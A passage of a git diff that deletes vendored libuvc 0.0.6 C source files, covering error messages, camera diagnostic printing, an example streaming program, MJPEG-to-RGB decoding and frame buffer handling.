-  {UVC_ERROR_INTERRUPTED, "Interrupted"},
-  {UVC_ERROR_NO_MEM, "Out of memory"},
-  {UVC_ERROR_NOT_SUPPORTED, "Not supported"},
-  {UVC_ERROR_INVALID_DEVICE, "Invalid device"},
-  {UVC_ERROR_INVALID_MODE, "Invalid mode"},
-  {UVC_ERROR_CALLBACK_EXISTS, "Callback exists"}
-};
-
-/** @brief Print a message explaining an error in the UVC driver
- * @ingroup diag
- *
- * @param err UVC error code
- * @param msg Optional custom message, prepended to output
- */
-void uvc_perror(uvc_error_t err, const char *msg) {
-  if (msg && *msg) {
-    fputs(msg, stderr);
-    fputs(": ", stderr);
-  }
-
-  fprintf(stderr, "%s (%d)\n", uvc_strerror(err), err);
-}
-
-/** @brief Return a string explaining an error in the UVC driver
- * @ingroup diag
- *
- * @param err UVC error code
- * @return error message
- */
-const char* uvc_strerror(uvc_error_t err) {
-  size_t idx;
-
-  for (idx = 0; idx < sizeof(uvc_error_msgs) / sizeof(*uvc_error_msgs); ++idx) {
-    if (uvc_error_msgs[idx].err == err) {
-      return uvc_error_msgs[idx].msg;
-    }
-  }
-
-  return "Unknown error";
-}
-
-/** @brief Print the values in a stream control block
- * @ingroup diag
- *
- * @param devh UVC device
- * @param stream Output stream (stderr if NULL)
- */
-void uvc_print_stream_ctrl(uvc_stream_ctrl_t *ctrl, FILE *stream) {
-  if (stream == NULL)
-    stream = stderr;
-
-  fprintf(stream, "bmHint: %04x\n", ctrl->bmHint);
-  fprintf(stream, "bFormatIndex: %d\n", ctrl->bFormatIndex);
-  fprintf(stream, "bFrameIndex: %d\n", ctrl->bFrameIndex);
-  fprintf(stream, "dwFrameInterval: %u\n", ctrl->dwFrameInterval);
-  fprintf(stream, "wKeyFrameRate: %d\n", ctrl->wKeyFrameRate);
-  fprintf(stream, "wPFrameRate: %d\n", ctrl->wPFrameRate);
-  fprintf(stream, "wCompQuality: %d\n", ctrl->wCompQuality);
-  fprintf(stream, "wCompWindowSize: %d\n", ctrl->wCompWindowSize);
-  fprintf(stream, "wDelay: %d\n", ctrl->wDelay);
-  fprintf(stream, "dwMaxVideoFrameSize: %u\n", ctrl->dwMaxVideoFrameSize);
-  fprintf(stream, "dwMaxPayloadTransferSize: %u\n", ctrl->dwMaxPayloadTransferSize);
-  fprintf(stream, "bInterfaceNumber: %d\n", ctrl->bInterfaceNumber);
-}
-
-static const char *_uvc_name_for_format_subtype(uint8_t subtype) {
-  switch (subtype) {
-  case UVC_VS_FORMAT_UNCOMPRESSED:
-    return "UncompressedFormat";
-  case UVC_VS_FORMAT_MJPEG:
-    return "MJPEGFormat";
-  case UVC_VS_FORMAT_FRAME_BASED:
-    return "FrameFormat";
-  default:
-    return "Unknown";
-  }
-}
-
-/** @brief Print camera capabilities and configuration.
- * @ingroup diag
- *
- * @param devh UVC device
- * @param stream Output stream (stderr if NULL)
- */
-void uvc_print_diag(uvc_device_handle_t *devh, FILE *stream) {
-  if (stream == NULL)
-    stream = stderr;
-
-  if (devh->info->ctrl_if.bcdUVC) {
-    uvc_streaming_interface_t *stream_if;
-    int stream_idx = 0;
-
-    uvc_device_descriptor_t *desc;
-    uvc_get_device_descriptor(devh->dev, &desc);
-
-    fprintf(stream, "DEVICE CONFIGURATION (%04x:%04x/%s) ---\n",
-        desc->idVendor, desc->idProduct,
-        desc->serialNumber ? desc->serialNumber : "[none]");
-
-    uvc_free_device_descriptor(desc);
-
-    fprintf(stream, "Status: %s\n", devh->streams ? "streaming" : "idle");
-
-    fprintf(stream, "VideoControl:\n"
-        "\tbcdUVC: 0x%04x\n",
-        devh->info->ctrl_if.bcdUVC);
-
-    DL_FOREACH(devh->info->stream_ifs, stream_if) {
-      uvc_format_desc_t *fmt_desc;
-
-      ++stream_idx;
-
-      fprintf(stream, "VideoStreaming(%d):\n"
-          "\tbEndpointAddress: %d\n\tFormats:\n",
-          stream_idx, stream_if->bEndpointAddress);
-
-      DL_FOREACH(stream_if->format_descs, fmt_desc) {
-        uvc_frame_desc_t *frame_desc;
-        int i;
-
-        switch (fmt_desc->bDescriptorSubtype) {
-          case UVC_VS_FORMAT_UNCOMPRESSED:
-          case UVC_VS_FORMAT_MJPEG:
-          case UVC_VS_FORMAT_FRAME_BASED:
-            fprintf(stream,
-                "\t\%s(%d)\n"
-                "\t\t  bits per pixel: %d\n"
-                "\t\t  GUID: ",
-                _uvc_name_for_format_subtype(fmt_desc->bDescriptorSubtype),
-                fmt_desc->bFormatIndex,
-                fmt_desc->bBitsPerPixel);
-
-            for (i = 0; i < 16; ++i)
-              fprintf(stream, "%02x", fmt_desc->guidFormat[i]);
-
-            fprintf(stream, " (%4s)\n", fmt_desc->fourccFormat );
-
-            fprintf(stream,
-                "\t\t  default frame: %d\n"
-                "\t\t  aspect ratio: %dx%d\n"
-                "\t\t  interlace flags: %02x\n"
-                "\t\t  copy protect: %02x\n",
-                fmt_desc->bDefaultFrameIndex,
-                fmt_desc->bAspectRatioX,
-                fmt_desc->bAspectRatioY,
-                fmt_desc->bmInterlaceFlags,
-                fmt_desc->bCopyProtect);
-
-            DL_FOREACH(fmt_desc->frame_descs, frame_desc) {
-              uint32_t *interval_ptr;
-
-              fprintf(stream,
-                  "\t\t\tFrameDescriptor(%d)\n"
-                  "\t\t\t  capabilities: %02x\n"
-                  "\t\t\t  size: %dx%d\n"
-                  "\t\t\t  bit rate: %d-%d\n"
-                  "\t\t\t  max frame size: %d\n"
-                  "\t\t\t  default interval: 1/%d\n",
-                  frame_desc->bFrameIndex,
-                  frame_desc->bmCapabilities,
-                  frame_desc->wWidth,
-                  frame_desc->wHeight,
-                  frame_desc->dwMinBitRate,
-                  frame_desc->dwMaxBitRate,
-                  frame_desc->dwMaxVideoFrameBufferSize,
-                  10000000 / frame_desc->dwDefaultFrameInterval);
-              if (frame_desc->intervals) {
-                for (interval_ptr = frame_desc->intervals;
-                     *interval_ptr;
-                     ++interval_ptr) {
-                  fprintf(stream,
-                      "\t\t\t  interval[%d]: 1/%d\n",
-		      (int) (interval_ptr - frame_desc->intervals),
-		      10000000 / *interval_ptr);
-                }
-              } else {
-                fprintf(stream,
-                    "\t\t\t  min interval[%d] = 1/%d\n"
-                    "\t\t\t  max interval[%d] = 1/%d\n",
-                    frame_desc->dwMinFrameInterval,
-                    10000000 / frame_desc->dwMinFrameInterval,
-                    frame_desc->dwMaxFrameInterval,
-                    10000000 / frame_desc->dwMaxFrameInterval);
-                if (frame_desc->dwFrameIntervalStep)
-                  fprintf(stream,
-                      "\t\t\t  interval step[%d] = 1/%d\n",
-                      frame_desc->dwFrameIntervalStep,
-                      10000000 / frame_desc->dwFrameIntervalStep);
-              }
-            }
-            break;
-          default:
-            fprintf(stream, "\t-UnknownFormat (%d)\n",
-                fmt_desc->bDescriptorSubtype );
-        }
-      }
-    }
-
-    fprintf(stream, "END DEVICE CONFIGURATION\n");
-  } else {
-    fprintf(stream, "uvc_print_diag: Device not configured!\n");
-  }
-}
-
-/** @brief Print all possible frame configuration.
- * @ingroup diag
- *
- * @param devh UVC device
- * @param stream Output stream (stderr if NULL)
- */
-void uvc_print_frameformats(uvc_device_handle_t *devh) {
-
-  if (devh->info->ctrl_if.bcdUVC) {
-    uvc_streaming_interface_t *stream_if;
-    int stream_idx = 0;
-    DL_FOREACH(devh->info->stream_ifs, stream_if) {
-      uvc_format_desc_t *fmt_desc;
-      ++stream_idx;
-
-      DL_FOREACH(stream_if->format_descs, fmt_desc) {
-        uvc_frame_desc_t *frame_desc;
-        int i;
-
-        switch (fmt_desc->bDescriptorSubtype) {
-          case UVC_VS_FORMAT_UNCOMPRESSED:
-          case UVC_VS_FORMAT_MJPEG:
-          case UVC_VS_FORMAT_FRAME_BASED:
-            printf("         \%s(%d)\n"
-                "            bits per pixel: %d\n"
-                "            GUID: ",
-                _uvc_name_for_format_subtype(fmt_desc->bDescriptorSubtype),
-                fmt_desc->bFormatIndex,
-                fmt_desc->bBitsPerPixel);
-
-            for (i = 0; i < 16; ++i)
-              printf("%02x", fmt_desc->guidFormat[i]);
-
-            printf(" (%4s)\n", fmt_desc->fourccFormat );
-
-            printf("            default frame: %d\n"
-                "            aspect ratio: %dx%d\n"
-                "            interlace flags: %02x\n"
-                "            copy protect: %02x\n",
-                fmt_desc->bDefaultFrameIndex,
-                fmt_desc->bAspectRatioX,
-                fmt_desc->bAspectRatioY,
-                fmt_desc->bmInterlaceFlags,
-                fmt_desc->bCopyProtect);
-
-            DL_FOREACH(fmt_desc->frame_descs, frame_desc) {
-              uint32_t *interval_ptr;
-
-              printf("               FrameDescriptor(%d)\n"
-                  "                  capabilities: %02x\n"
-                  "                  size: %dx%d\n"
-                  "                  bit rate: %d-%d\n"
-                  "                  max frame size: %d\n"
-                  "                  default interval: 1/%d\n",
-                  frame_desc->bFrameIndex,
-                  frame_desc->bmCapabilities,
-                  frame_desc->wWidth,
-                  frame_desc->wHeight,
-                  frame_desc->dwMinBitRate,
-                  frame_desc->dwMaxBitRate,
-                  frame_desc->dwMaxVideoFrameBufferSize,
-                  10000000 / frame_desc->dwDefaultFrameInterval);
-              if (frame_desc->intervals) {
-                for (interval_ptr = frame_desc->intervals;
-                     *interval_ptr;
-                     ++interval_ptr) {
-                  printf("                  interval[%d]: 1/%d\n",
-		      (int) (interval_ptr - frame_desc->intervals),
-		      10000000 / *interval_ptr);
-                }
-              } else {
-                printf("                  min interval[%d] = 1/%d\n"
-                    "                  max interval[%d] = 1/%d\n",
-                    frame_desc->dwMinFrameInterval,
-                    10000000 / frame_desc->dwMinFrameInterval,
-                    frame_desc->dwMaxFrameInterval,
-                    10000000 / frame_desc->dwMaxFrameInterval);
-                if (frame_desc->dwFrameIntervalStep)
-                  printf("                  interval step[%d] = 1/%d\n",
-                      frame_desc->dwFrameIntervalStep,
-                      10000000 / frame_desc->dwFrameIntervalStep);
-              }
-            }
-            break;
-          default:
-            printf("\t-UnknownFormat (%d)\n",fmt_desc->bDescriptorSubtype );
-        }
-      }
-    }
-  } else {
-    printf("uvc_print_frameformats: Device not configured!\n");
-  }
-}
diff --git a/thirdparty/libuvc-0.0.6/src/example.c b/thirdparty/libuvc-0.0.6/src/example.c
deleted file mode 100644
index 8178cbf..0000000
--- a/thirdparty/libuvc-0.0.6/src/example.c
+++ /dev/null
@@ -1,148 +0,0 @@
-#include "libuvc/libuvc.h"
-#include <stdio.h>
-
-/* This callback function runs once per frame. Use it to perform any
- * quick processing you need, or have it put the frame into your application's
- * input queue. If this function takes too long, you'll start losing frames. */
-void cb(uvc_frame_t *frame, void *ptr) {
-  uvc_frame_t *bgr;
-  uvc_error_t ret;
-
-  /* We'll convert the image from YUV/JPEG to BGR, so allocate space */
-  bgr = uvc_allocate_frame(frame->width * frame->height * 3);
-  if (!bgr) {
-    printf("unable to allocate bgr frame!");
-    return;
-  }
-
-  /* Do the BGR conversion */
-  ret = uvc_any2bgr(frame, bgr);
-  if (ret) {
-    uvc_perror(ret, "uvc_any2bgr");
-    uvc_free_frame(bgr);
-    return;
-  }
-
-  /* Call a user function:
-   *
-   * my_type *my_obj = (*my_type) ptr;
-   * my_user_function(ptr, bgr);
-   * my_other_function(ptr, bgr->data, bgr->width, bgr->height);
-   */
-
-  /* Call a C++ method:
-   *
-   * my_type *my_obj = (*my_type) ptr;
-   * my_obj->my_func(bgr);
-   */
-
-  /* Use opencv.highgui to display the image:
-   * 
-   * cvImg = cvCreateImageHeader(
-   *     cvSize(bgr->width, bgr->height),
-   *     IPL_DEPTH_8U,
-   *     3);
-   *
-   * cvSetData(cvImg, bgr->data, bgr->width * 3); 
-   *
-   * cvNamedWindow("Test", CV_WINDOW_AUTOSIZE);
-   * cvShowImage("Test", cvImg);
-   * cvWaitKey(10);
-   *
-   * cvReleaseImageHeader(&cvImg);
-   */
-
-  uvc_free_frame(bgr);
-}
-
-int main(int argc, char **argv) {
-  uvc_context_t *ctx;
-  uvc_device_t *dev;
-  uvc_device_handle_t *devh;
-  uvc_stream_ctrl_t ctrl;
-  uvc_error_t res;
-
-  /* Initialize a UVC service context. Libuvc will set up its own libusb
-   * context. Replace NULL with a libusb_context pointer to run libuvc
-   * from an existing libusb context. */
-  res = uvc_init(&ctx, NULL);
-
-  if (res < 0) {
-    uvc_perror(res, "uvc_init");
-    return res;
-  }
-
-  puts("UVC initialized");
-
-  /* Locates the first attached UVC device, stores in dev */
-  res = uvc_find_device(
-      ctx, &dev,
-      0, 0, NULL); /* filter devices: vendor_id, product_id, "serial_num" */
-
-  if (res < 0) {
-    uvc_perror(res, "uvc_find_device"); /* no devices found */
-  } else {
-    puts("Device found");
-
-    /* Try to open the device: requires exclusive access */
-    res = uvc_open(dev, &devh);
-
-    if (res < 0) {
-      uvc_perror(res, "uvc_open"); /* unable to open device */
-    } else {
-      puts("Device opened");
-
-      /* Print out a message containing all the information that libuvc
-       * knows about the device */
-      uvc_print_diag(devh, stderr);
-
-      /* Try to negotiate a 640x480 30 fps YUYV stream profile */
-      res = uvc_get_stream_ctrl_format_size(
-          devh, &ctrl, /* result stored in ctrl */
-          UVC_FRAME_FORMAT_YUYV, /* YUV 422, aka YUV 4:2:2. try _COMPRESSED */
-          640, 480, 30 /* width, height, fps */
-      );
-
-      /* Print out the result */
-      uvc_print_stream_ctrl(&ctrl, stderr);
-
-      if (res < 0) {
-        uvc_perror(res, "get_mode"); /* device doesn't provide a matching stream */
-      } else {
-        /* Start the video stream. The library will call user function cb:
-         *   cb(frame, (void*) 12345)
-         */
-        res = uvc_start_streaming(devh, &ctrl, cb, 12345, 0);
-
-        if (res < 0) {
-          uvc_perror(res, "start_streaming"); /* unable to start stream */
-        } else {
-          puts("Streaming...");
-
-          uvc_set_ae_mode(devh, 1); /* e.g., turn on auto exposure */
-
-          sleep(10); /* stream for 10 seconds */
-
-          /* End the stream. Blocks until last callback is serviced */
-          uvc_stop_streaming(devh);
-          puts("Done streaming.");
-        }
-      }
-
-      /* Release our handle on the device */
-      uvc_close(devh);
-      puts("Device closed");
-    }
-
-    /* Release the device descriptor */
-    uvc_unref_device(dev);
-  }
-
-  /* Close the UVC context. This closes and cleans up any existing device handles,
-   * and it closes the libusb context if one was not provided. */
-  uvc_exit(ctx);
-  puts("UVC exited");
-
-  return 0;
-}
-
diff --git a/thirdparty/libuvc-0.0.6/src/frame-mjpeg.c b/thirdparty/libuvc-0.0.6/src/frame-mjpeg.c
deleted file mode 100644
index d2a3fee..0000000
--- a/thirdparty/libuvc-0.0.6/src/frame-mjpeg.c
+++ /dev/null
@@ -1,187 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2014 Robert Xiao
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-
-/**
- * @defgroup frame Frame processing
- */
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-#include <jpeglib.h>
-#include <setjmp.h>
-
-extern uvc_error_t uvc_ensure_frame_size(uvc_frame_t *frame, size_t need_bytes);
-
-struct error_mgr {
-  struct jpeg_error_mgr super;
-  jmp_buf jmp;
-};
-
-static void _error_exit(j_common_ptr dinfo) {
-  struct error_mgr *myerr = (struct error_mgr *)dinfo->err;
-  (*dinfo->err->output_message)(dinfo);
-  longjmp(myerr->jmp, 1);
-}
-
-/* ISO/IEC 10918-1:1993(E) K.3.3. Default Huffman tables used by MJPEG UVC devices
-   which don't specify a Huffman table in the JPEG stream. */
-static const unsigned char dc_lumi_len[] = 
-  {0, 0, 1, 5, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0};
-static const unsigned char dc_lumi_val[] = 
-  {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11};
-
-static const unsigned char dc_chromi_len[] = 
-  {0, 0, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0};
-static const unsigned char dc_chromi_val[] = 
-  {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11};
-
-static const unsigned char ac_lumi_len[] = 
-  {0, 0, 2, 1, 3, 3, 2, 4, 3, 5, 5, 4, 4, 0, 0, 1, 0x7d};
-static const unsigned char ac_lumi_val[] = 
-  {0x01, 0x02, 0x03, 0x00, 0x04, 0x11, 0x05, 0x12, 0x21,
-   0x31, 0x41, 0x06, 0x13, 0x51, 0x61, 0x07, 0x22, 0x71,
-   0x14, 0x32, 0x81, 0x91, 0xa1, 0x08, 0x23, 0x42, 0xb1,
-   0xc1, 0x15, 0x52, 0xd1, 0xf0, 0x24, 0x33, 0x62, 0x72,
-   0x82, 0x09, 0x0a, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x25,
-   0x26, 0x27, 0x28, 0x29, 0x2a, 0x34, 0x35, 0x36, 0x37,
-   0x38, 0x39, 0x3a, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48,
-   0x49, 0x4a, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59,
-   0x5a, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6a,
-   0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7a, 0x83,
-   0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8a, 0x92, 0x93,
-   0x94, 0x95, 0x96, 0x97, 0x98, 0x99, 0x9a, 0xa2, 0xa3,
-   0xa4, 0xa5, 0xa6, 0xa7, 0xa8, 0xa9, 0xaa, 0xb2, 0xb3,
-   0xb4, 0xb5, 0xb6, 0xb7, 0xb8, 0xb9, 0xba, 0xc2, 0xc3,
-   0xc4, 0xc5, 0xc6, 0xc7, 0xc8, 0xc9, 0xca, 0xd2, 0xd3,
-   0xd4, 0xd5, 0xd6, 0xd7, 0xd8, 0xd9, 0xda, 0xe1, 0xe2,
-   0xe3, 0xe4, 0xe5, 0xe6, 0xe7, 0xe8, 0xe9, 0xea, 0xf1,
-   0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, 0xf9, 0xfa};
-static const unsigned char ac_chromi_len[] = 
-  {0, 0, 2, 1, 2, 4, 4, 3, 4, 7, 5, 4, 4, 0, 1, 2, 0x77};
-static const unsigned char ac_chromi_val[] = 
-  {0x00, 0x01, 0x02, 0x03, 0x11, 0x04, 0x05, 0x21, 0x31,
-   0x06, 0x12, 0x41, 0x51, 0x07, 0x61, 0x71, 0x13, 0x22,
-   0x32, 0x81, 0x08, 0x14, 0x42, 0x91, 0xa1, 0xb1, 0xc1,
-   0x09, 0x23, 0x33, 0x52, 0xf0, 0x15, 0x62, 0x72, 0xd1,
-   0x0a, 0x16, 0x24, 0x34, 0xe1, 0x25, 0xf1, 0x17, 0x18,
-   0x19, 0x1a, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x35, 0x36,
-   0x37, 0x38, 0x39, 0x3a, 0x43, 0x44, 0x45, 0x46, 0x47,
-   0x48, 0x49, 0x4a, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58,
-   0x59, 0x5a, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69,
-   0x6a, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7a,
-   0x82, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8a,
-   0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x99, 0x9a,
-   0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, 0xa8, 0xa9, 0xaa,
-   0xb2, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, 0xb8, 0xb9, 0xba,
-   0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7, 0xc8, 0xc9, 0xca,
-   0xd2, 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, 0xd8, 0xd9, 0xda,
-   0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, 0xe8, 0xe9, 0xea,
-   0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, 0xf9, 0xfa};
-
-#define COPY_HUFF_TABLE(dinfo,tbl,name) do { \
-  if(dinfo->tbl == NULL) dinfo->tbl = jpeg_alloc_huff_table((j_common_ptr)dinfo); \
-  memcpy(dinfo->tbl->bits, name##_len, sizeof(name##_len)); \
-  memset(dinfo->tbl->huffval, 0, sizeof(dinfo->tbl->huffval)); \
-  memcpy(dinfo->tbl->huffval, name##_val, sizeof(name##_val)); \
-} while(0)
-
-static void insert_huff_tables(j_decompress_ptr dinfo) {
-  COPY_HUFF_TABLE(dinfo, dc_huff_tbl_ptrs[0], dc_lumi);
-  COPY_HUFF_TABLE(dinfo, dc_huff_tbl_ptrs[1], dc_chromi);
-  COPY_HUFF_TABLE(dinfo, ac_huff_tbl_ptrs[0], ac_lumi);
-  COPY_HUFF_TABLE(dinfo, ac_huff_tbl_ptrs[1], ac_chromi);
-}
-
-/** @brief Convert an MJPEG frame to RGB
- * @ingroup frame
- *
- * @param in MJPEG frame
- * @param out RGB frame
- */
-uvc_error_t uvc_mjpeg2rgb(uvc_frame_t *in, uvc_frame_t *out) {
-  struct jpeg_decompress_struct dinfo;
-  struct error_mgr jerr;
-  size_t lines_read;
-
-  if (in->frame_format != UVC_FRAME_FORMAT_MJPEG)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (uvc_ensure_frame_size(out, in->width * in->height * 3) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = UVC_FRAME_FORMAT_RGB;
-  out->step = in->width * 3;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  dinfo.err = jpeg_std_error(&jerr.super);
-  jerr.super.error_exit = _error_exit;
-
-  if (setjmp(jerr.jmp)) {
-    goto fail;
-  }
-
-  jpeg_create_decompress(&dinfo);
-  jpeg_mem_src(&dinfo, in->data, in->data_bytes);
-  jpeg_read_header(&dinfo, TRUE);
-
-  if (dinfo.dc_huff_tbl_ptrs[0] == NULL) {
-    /* This frame is missing the Huffman tables: fill in the standard ones */
-    insert_huff_tables(&dinfo);
-  }
-
-  dinfo.out_color_space = JCS_RGB;
-  dinfo.dct_method = JDCT_IFAST;
-
-  jpeg_start_decompress(&dinfo);
-
-  lines_read = 0;
-  while (dinfo.output_scanline < dinfo.output_height) {
-    unsigned char *buffer[1] = {( unsigned char*) out->data + lines_read * out->step };
-    int num_scanlines;
-
-    num_scanlines = jpeg_read_scanlines(&dinfo, buffer, 1);
-    lines_read += num_scanlines;
-  }
-
-  jpeg_finish_decompress(&dinfo);
-  jpeg_destroy_decompress(&dinfo);
-  return 0;
-
-fail:
-  jpeg_destroy_decompress(&dinfo);
-  return UVC_ERROR_OTHER;
-}
diff --git a/thirdparty/libuvc-0.0.6/src/frame.c b/thirdparty/libuvc-0.0.6/src/frame.c
deleted file mode 100644
index 35dfce4..0000000
--- a/thirdparty/libuvc-0.0.6/src/frame.c
+++ /dev/null
@@ -1,449 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-/**
- * @defgroup frame Frame processing
- * @brief Tools for managing frame buffers and converting between image formats
- */
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-
-/** @internal */
-uvc_error_t uvc_ensure_frame_size(uvc_frame_t *frame, size_t need_bytes) {
-  if (frame->library_owns_data) {
-    if (!frame->data || frame->data_bytes != need_bytes) {
-      frame->data_bytes = need_bytes;
-      frame->data = realloc(frame->data, frame->data_bytes);
-    }
-    if (!frame->data)
-      return UVC_ERROR_NO_MEM;
-    return UVC_SUCCESS;
-  } else {
-    if (!frame->data || frame->data_bytes < need_bytes)
-      return UVC_ERROR_NO_MEM;
-    return UVC_SUCCESS;
-  }
-}
-
-/** @brief Allocate a frame structure
- * @ingroup frame
- *
- * @param data_bytes Number of bytes to allocate, or zero
- * @return New frame, or NULL on error
- */
-uvc_frame_t *uvc_allocate_frame(size_t data_bytes) {
-  uvc_frame_t *frame = malloc(sizeof(*frame));
-
-  if (!frame)
-    return NULL;
-
-  memset(frame, 0, sizeof(*frame));
-
-  frame->library_owns_data = 1;
-
-  if (data_bytes > 0) {
-    frame->data_bytes = data_bytes;
-    frame->data = malloc(data_bytes);
-
-    if (!frame->data) {
-      free(frame);
-      return NULL;
-    }
-  }
-
-  return frame;
-}
-
-/** @brief Free a frame structure
- * @ingroup frame
- *
- * @param frame Frame to destroy
- */
-void uvc_free_frame(uvc_frame_t *frame) {
-  if (frame->data_bytes > 0 && frame->library_owns_data)
-    free(frame->data);
-
-  free(frame);
-}
-
-static inline unsigned char sat(int i) {
-  return (unsigned char)( i >= 255 ? 255 : (i < 0 ? 0 : i));
-}
-
-/** @brief Duplicate a frame, preserving color format
- * @ingroup frame
- *
- * @param in Original frame
- * @param out Duplicate frame
- */
-uvc_error_t uvc_duplicate_frame(uvc_frame_t *in, uvc_frame_t *out) {
-  if (uvc_ensure_frame_size(out, in->data_bytes) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = in->frame_format;
-  out->step = in->step;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  memcpy(out->data, in->data, in->data_bytes);
-
-  return UVC_SUCCESS;
-}
-
-#define YUYV2RGB_2(pyuv, prgb) { \
-    float r = 1.402f * ((pyuv)[3]-128); \
-    float g = -0.34414f * ((pyuv)[1]-128) - 0.71414f * ((pyuv)[3]-128); \
-    float b = 1.772f * ((pyuv)[1]-128); \
-    (prgb)[0] = sat(pyuv[0] + r); \
-    (prgb)[1] = sat(pyuv[0] + g); \
-    (prgb)[2] = sat(pyuv[0] + b); \
-    (prgb)[3] = sat(pyuv[2] + r); \
-    (prgb)[4] = sat(pyuv[2] + g); \
-    (prgb)[5] = sat(pyuv[2] + b); \
-    }
-#define IYUYV2RGB_2(pyuv, prgb) { \
-    int r = (22987 * ((pyuv)[3] - 128)) >> 14; \
-    int g = (-5636 * ((pyuv)[1] - 128) - 11698 * ((pyuv)[3] - 128)) >> 14; \
-    int b = (29049 * ((pyuv)[1] - 128)) >> 14; \
-    (prgb)[0] = sat(*(pyuv) + r); \
-    (prgb)[1] = sat(*(pyuv) + g); \
-    (prgb)[2] = sat(*(pyuv) + b); \
-    (prgb)[3] = sat((pyuv)[2] + r); \
-    (prgb)[4] = sat((pyuv)[2] + g); \
-    (prgb)[5] = sat((pyuv)[2] + b); \
-    }
